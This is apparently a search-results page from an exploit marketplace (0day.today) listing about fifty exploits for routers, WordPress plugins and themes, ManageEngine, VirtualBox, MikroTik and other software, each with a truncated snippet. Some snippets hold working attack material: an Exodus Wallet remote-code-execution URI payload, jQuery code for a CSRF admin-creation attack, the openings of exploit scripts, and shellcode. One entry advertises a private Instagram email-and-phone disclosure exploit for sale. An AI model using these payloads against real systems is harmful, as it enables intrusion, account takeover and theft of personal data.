39001 matches found
ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password Exploit
Exploit for hardware platform in category web applications import requests import sys import urllib3 ip = sys.argv1 user = sys.argv2 newPassword = sys.argv3 requests.packages.urilib3.disablewarnings urllib3.disablewarningsurllib3.exceptions.InsecureRequestWarning data = "groupid": '', "actionmode...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution Exploit
Exploit for windows platform in category remote exploits window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa=' 0day.today 2018-03-09...
Dodocool DC38 N300 - Cross-site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery Date: 17-01-2018 Exploit Authors: Raffaele Sabato Contact: https://twitter.com/syrion89 Vendor: DODOCOOL Vendor Homepage: www.dodocool.com Version: RTN2-AW.GD.R3465.1.20161103 CVE:...
ManageEngine OpManager / Applications Manager / IT360 -FailOverServlet Multiple Vulnerability
Exploit for multiple platform in category web applications Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 Discovered by Pedro Ribeiro email protected, Agile Information Security...
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities
Exploit for multiple platform in category web applications Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 Discovered by Pedro Ribeiro email protected, Agile Information Security ========================================================================== Disclosure:...
ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download Vulnerability
Exploit for multiple platform in category web applications Arbitrary file download in ManageEngine Netflow Analyzer and IT360 Discovered by Pedro Ribeiro email protected, Agile Information Security ========================================================================== Disclosure: 30/11/2014 /...
Lorex LH300 Series - ActiveX Buffer Overflow (PoC) Exploit
Exploit for hardware platform in category dos / poc Buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. The company is Lorex Technologies, a major video surveillance manufacturer that is very popular in the...
BMC BladeLogic 8.3.00.64 - Remote Command Execution Exploit
Exploit for windows platform in category remote exploits Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version Filename: BMCrexec.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-24 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog...
WordPress Learning Management System Plugin - course_id SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Good LMS - Learning Management System WP Plugin SQL Injection Exploit Author Web Site: http://esecurity.ir Special Thanks : Meisam Monsef email protected - Telegram ID : @meisamrce Vendor Homepage: https://goodlayers.com/ Versio...
Apache Hadoop YARN NodeManager Password Leak Vulnerability
In Apache Hadoop 2.7.3 and 2.7.4, the security fix for CVE-2016-3086 is incomplete. The YARN NodeManager can leak the password for credential store provider used by the NodeManager to YARN Applications. CVE-2017-15718: Apache Hadoop YARN NodeManager vulnerability Severity: Important Vendor: The...
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow Exploit
Exploit for windows platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow', 'Description' = %q This...
Kaltura - Remote PHP Code Execution over Cookie Exploit
This Metasploit module exploits an Object Injection vulnerability in Kaltura. By exploiting this vulnerability, unauthenticated users can execute arbitrary code under the context of the web server user. Kaltura makes use of a hard-coded cookie secret which allows to sign arbitrary cookie data...
Blizzard Update Agent - JSON RPC DNS Rebinding Vulnerability
Exploit for windows platform in category local exploits All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed. The agent utility creates a...
Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape Vulnerability
Exploit for multiple platform in category local exploits SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities Source: https://blogs.securiteam.com/index.php/archives/3649 Vulnerabilities summary The following advisory describes two 2 guest to host escape found in Oracle...
GoAhead Web Server 2.5 < 3.6.5 - HTTPd LD_PRELOAD Arbitrary Module Load Exploit
This Metasploit module triggers an arbitrary shared library load vulnerability in GoAhead web server versions between 2.5 and that have the CGI module enabled. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
WordPress Email Subscribers & Newsletters 3.4.7 Plugin - Information Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure Google Dork: Date: 2018-01-23 Exploit Author: ThreatPress Security Vendor Homepage: http://icegram.com/ Software Link:...
Zechat 1.5 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266 Version: 1.5...
Easy Car Script 2014 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Easy Car Script 2014 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.easyphotostore.com/ Software Link: http://www.easycarscript.com/ Version: 2014 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE:...
Wchat 1.5 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 Version:...
Asus Unauthenticated LAN Remote Command Execution Exploit
Exploit for hardware platform in category remote exploits Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. AsusWRT is “THE...
MikroTik RouterOS < 6.38.5 Remote Command Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python2 Mikrotik Chimay Red Stack Clash Exploit by wsxarcher based on BigNerd95 POC tested on RouterOS 6.38.4 x86 ASLR enabled on libs only DEP enabled import socket, time, sys, struct from pwn import import ropgadget...
Professional Local Directory Script 1.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Professional Local Directory Script 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.eihitech.com/ Software Link: http://www.eihitech.com/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
RAVPower 2.000.056 - Root Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits """ Exploit Title: RAVPower - remote root Date: 23/01/2018 Exploit Authors: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5997 """...
Oracle Financial Services Analytical Application XXE / XSS Vulnerabilities
Exploit for multiple platform in category web applications The Oracle Financial Services Analytical Application is affected by an XML External Entity XXE vulnerability which may lead to disclosing sensitive information. It is also affected by a reflected cross site scripting XSS issue. Vendor...
Flexible Poll 1.2 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Flexible Poll 1.2 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://ddywpro.com/ Software Link: https://codecanyon.net/item/flexible-poll/4363114 Version: 1.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CV...
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications New Admin Username: Password: Confirm Password: Email: $"ekleabi".live'click',function $.ajax type: "POST", url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajaxnewadmin.php", data: username:$".efe username".val,...
RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin) Vulnerability
Exploit for php platform in category web applications 0day.today 2018-03-17...
Quickad 4.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675 Version: 4.0 Category: Webap...
Tumder 2.1 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://sndr.co.ve/ Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994 Version: 2.1 Category:...
LiveCRM SaaS Cloud 1.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: LiveCRM SaaS Cloud 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://livecrm.co/ Software Link:...
Affiligator 2.1.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Affiligator - Affiliate Webshop Management System 2.1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: https://www.getaffiligator.com/ Software Link:...
RAVPower 2.000.056 - Memory Disclosure Exploit
Exploit for hardware platform in category dos / poc """ Exploit Title: RAVPower - remote stack disclosure Date: 22/01/2018 Exploit Author: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5319...
Apache Hadoop 0.23.x Private File Disclosure Vulnerability
A vulnerability allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host. Apache Hadoop...
MixPad 5.00 - Buffer Overflow Exploit
Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow Date: 21-01-2017 Vulnerable Software: NCH Software MixPad Vendor Homepage: http://www.nch.com.au/mixpad Version: v5.00 Softwar...
Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)
/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...
HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation Exploit
Exploit for windows platform in category local exploits Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def sendrequestbody: url="http://localhost:16386/" headers = "Content-Type": "text/xml;...
NEC Univerge SV9100/SV8100 WebPro 10.0 - Configuration Download Vulnerability
NEC Univerge SV9100/SV8100 WebPro version 10.0 suffers from a remote configuration download vulnerability. The gzipped telephone system configuration file 'config.gz' or 'config.pcpx' that contains the unencrypted data file 'conf.pcpn', can be downloaded by an attacker from the root directory if...
CentOS Web Panel 0.9.8.12 - row_id / domain SQL Injection Vulnerability
Exploit for php platform in category web applications Document Title: =============== CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities Product & Service Introduction: =============================== CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy...
Instagram info disclosure (email + phone) 0day Exploit
Usage Info 1.make the files from exploit codes 2.host them on your web 3.you're all set! This is private exploit. You can buy it at https://0day.today...
PHPFreeChat 1.7 - Denial of Service Exploit
Exploit for php platform in category web applications Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service Version: 1.7 and earlier Date: 21/01/2018 Vendor Homepage: http://www.phpfreechat.net Software Link: http://www.phpfreechat.net/download Exploit Author: A. Pakbaz CVE : CVE-2018-59...
Wordpress endlesshorizon theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress endlesshorizon theme - Arbitrary file download author : MrSqar Yemeni hacker Team : IT-Geeks Tested on : BackBox linux check if site is vulnerabe :...
Wordpress newspro2891 theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress newspro2891 theme - Arbitrary file download author : MrSqar Yemeni hacker Team : IT-Geeks dork : inurl:/wp-content/themes/newspro2891 Tested on : BackBox...
Wordpress oxygen theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress oxygen theme - Arbitrary file download author : MrSqar Yemeni hacker Team : IT-Geeks Tested on : BackBox linux check if site is vulnerabe :...
OTRS 5.0.x/6.0.x - Remote Command Execution Vulnerability
Exploit for perl platform in category web applications Exploit Title: OTRS Shell Access Exploit Author: Bæln0rn Vendor Homepage: https://www.otrs.com/ Software Link: http://ftp.otrs.org/pub/otrs/ Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 Tested on: OTRS 5.0.2/CentOS 7.2.1511 CVE :...
DarkComet (C2 Server) - File Upload Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python3 EDB Note: Source https://gist.github.com/PseudoLaboratories/260b6f24844785aacc1e2fb61dd05c01/259944bd94a0d289ef80b9138c1e3f97a97aa9cd from time import sleep from socket import socket, AFINET, SOCKSTREAM, error from r...
Wordpress liberator theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress liberator theme arbitrary file download author : MrSqar Yemeni hacker Team : IT-Geeks Tested on : BackBox linux check if site is vulnerabe :...
Wordpress duena theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress duena theme - Arbitrary file download author : MrSqar Yemeni hacker Team : IT-Geeks Tested on : BackBox linux check if site is vulnerabe :...
Wordpress cafesalivation theme - Arbitrary file download Vulnerability
Exploit for php platform in category web applications -========================================================- Exploit title : Wordpress cafesalivation theme - Arbitrary file downloadliberator author : MrSqar Yemeni hacker Team : IT-Geeks Tested on : BackBox linux check if site is vulnerabe :...
Claroline < 1.7.7 - Arbitrary File Inclusion Vulnerability
Exploit for php platform in category web applications Claroline Arbitrary File Inclusion Vendor: Claroline Product: Claroline Version: 0 $uidReset = true; $clarologinSucceeded = tr...
SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite Vulnerability
Exploit for php platform in category web applications SquirrelMail Arbitrary Variable Overwrite Vendor: SquirrelMail Product: SquirrelMail Version: = 1.4.7 Website: http://www.squirrelmail.org BID: 19486 CVE: CVE-2006-4019 OSVDB: 27917 SECUNIA: 21354 Description: SquirrelMail is a standards-based...